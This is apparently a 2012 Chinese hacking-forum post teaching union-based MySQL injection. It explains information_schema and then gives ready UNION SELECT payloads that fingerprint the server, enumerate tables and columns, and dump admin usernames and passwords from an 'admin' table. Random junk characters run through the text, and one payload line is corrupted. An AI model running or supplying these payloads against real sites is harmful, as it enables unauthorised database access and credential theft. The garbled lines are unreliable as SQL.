找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1898|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法3 x/ |+ n- n& d
. B5 c& J3 R6 \- m: F
学习盲注前先了解下 IFORMATION_SCHEMA 库
; \: x" w% e, {1 B5 Z1 i
* Z& t- g6 U  V0 m) \' V! yMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有+ S4 e- d2 V1 t: @- G
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。/ K+ _& t; v& K
1.得到所有数据库名:
3 C/ D6 B4 v' Z) Q- P$ j  P|SCHEMATA ->存储数据库名的表
% r0 ]& @2 K3 h# L; S  Z|---字段:SCHEMA_NAME ->数据库名称
& S- U6 E3 @5 V0 ^7 x: E" Q
, G+ R0 j8 N& y, W  h|TABLES ->存储表名
& {! s" J+ g  n7 I7 e5 g, o' J. B|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名) y8 r  B0 D# \6 r- {% [$ a
|---字段:TABLE_NAME ->存储表的表名
1 h& }' W! U  N& B$ }- ~: \( ^/ {
, X1 V6 P2 I) k+ v( i" [6 S! w|COLUMNS ->存储的字段名表  N3 |% I* t/ P
|---字段:TABLE_SCHEMA ->该字段所属数据库名" M- y2 j, Z( Q& u
|---字段:TABLE_NAME ->存储所属表的名称7 d, M: A5 j7 q$ ^3 V8 b

% k2 D2 q" ^3 e1 D& Y  D% x|---字段:COLUMN_NAME ->该字段的名称
- M( U$ b7 s6 ]# B2 T0 g( x/ E- G, G) x

* }$ V  Y7 c! D! m" p1 U* N* {  K  s- o6 y
############################################################################ J/ p; ~& C6 N. n. u
. N% `- n3 W2 [  \) e
0x001 获取系统信息:. @( [7 p8 ^, f" G3 \+ b
/ n7 c" l& t# Z' i+ T
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*; v( K: s  m2 v: ~: W4 d
* A  m/ J3 R. T+ H& e, C' G) O6 v# \
/*7 J# E0 I- h3 `

& o1 f8 [. }  g, s& N3 r3 F@@global.version_compile_os 获取系统版本
* q, Q1 h8 B2 D+ ^
( \8 L/ g) x: i3 |8 k# ]  C* B@@datadir 数据库路径
: _6 h( V& H" k( T  Qdatabase() 当前数据库名称0 l) R1 n7 S6 c5 [
0x3c62723e 换行HEX值
9 l) ~" h4 r1 M4 S2 j! m3 E9 [
*/
! G' L* A1 B8 e0 q, m0 X( I* ]1 m9 Z  f$ h) W* c$ [: t7 B( F; R2 \
* b( x/ b/ i' d/ X

0 @3 L+ i8 z  N( }9 h3 ]) N######################################################################
6 r5 D7 b/ P3 s, z" v) c1 h* r
8 u% @* v! U3 _/ ^! ^& w/ W- L0x002 获取表名
/ V; z) y, H/ k; g5 I. x: V* S1 P5 S5 M( f% b% r/ _
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*7 l* k- ]$ w! i$ J: Y7 t
1 T9 @7 _4 S  K7 E1 S
# S  N7 F' |+ ^4 K6 [

, Q: ^5 |3 k$ c1 D2 X: x3 O/*% }- c: {" O" r/ F

8 ?4 l$ S% V) b5 e: w; d. ~0x67617264656e 为当前数据库名
8 _2 {+ K& m/ ?# P, m, D3 d3 z* a. e# `
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名3 o, @% f* e$ w5 Z( g4 I$ S& T* _2 P

" b7 E' m9 N8 n% i*/& R" G# x; d" H7 J, h
) N7 R$ `1 o. S% v  L
######################################################################
5 t% L$ y6 l* f" {$ t5 J  \, ^3 B& Q# |6 f8 P7 x- h. X
/ k- Z9 }& l! ?
3 B$ w: \: S$ k* K" T
0x003 获取字段7 l( ]5 Z& {* m( m
# R+ v; ~' p( r6 G5 R% \7 u
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
: v7 I3 N: K5 \0 v" y3 W# b& V: ~8 H) K7 ~3 m5 I
/*- w) j. f. S8 {5 c
& @; ^* q8 Z5 A6 n. F/ w8 Y0 ?
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段& J3 T. h8 `* F% y$ l8 @

% U+ m2 l4 \" O0x61646d696e ->选择一个表
5 k' e! {4 L  T( n) V4 R1 f8 s, F! q% D: |
0x67617264656e ->数据库名
6 X, ]2 ~$ B3 |8 C( M3 y8 B( r: m3 @) M
*/
# I% E9 O$ J! @$ L) m! j6 z1 G  q5 I8 R  x% }0 O
#####################################################################2 r- m# R- P: V
0 u) q1 K8 n* c9 I  G
1 I# k& n9 `6 c2 P/ L% H: w

( L" x- y: f* {7 J0x004 获取数据9 s5 l" b6 j. s& Z8 |+ a
7 W  `' G6 L, C1 o9 J4 S
union select 1,2,34 J0 c3 ~3 c3 G, @3 B
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
; c( f$ S, i! l' z" G6 K/ }8 d* z, d" w6 N/ H8 |' P* t& L$ ^& u
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
6 S, Z9 R2 @) z3 A, T
: w2 a  q0 r. w, I6 e# N' v4 n2 ^
( N  B# @0 R& \, }- d  {& i. m# w& K
/*) f) h+ Z/ a' \, d

1 M. o* @5 k! }* d0x3c62723e 换行符号HEX编码
% u! {0 G! ]* G& q! N
4 B8 L3 F. b5 J) y4 @group_concat 同时获得该字段所有数据
: Q7 m6 O  b+ B$ n; \# p
( C3 f) A+ z& q/ C*/: f' P! U+ a; H8 R$ q

$ R& t( M$ _0 p9 t/ U* |  f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表